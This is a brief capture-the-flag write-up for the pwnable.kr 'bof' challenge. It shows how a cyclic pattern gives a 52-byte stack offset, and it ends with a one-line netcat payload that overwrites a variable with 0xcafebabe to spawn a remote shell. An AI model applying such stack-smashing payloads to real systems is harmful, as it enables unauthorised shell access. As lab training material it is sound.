#bof

This challenge is accessed remotely, we still have access to the source code. The aim is to smash the stack to overwrite the value of overflowme so that it becomes equal to `0xcafebabe`. From there we should spawn a shell.

----------

#solution

Using gdb and a custom python script, we can determine the offset from overflowme and key by passing a pattern of characters to the program:

    python3 eip_offset.py -l 6
    Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9

Using the same script I can get the offset of overflowme by using the content of ebp

    python3 eip_offset.py -l 60 -a 0x62413762
    52

 The offset to overflowme is 52 bytes, in order to exploit this program I need to pass 52bytes + the value 0xcafebabe. In addition to this I use a trick via `cat` to read the standard input, preventing the program to close instantly
 

    (python -c "print 'A' * 52 + '\xbe\xba\xfe\xca\n'"; cat - ) | nc pwnable.kr 9000

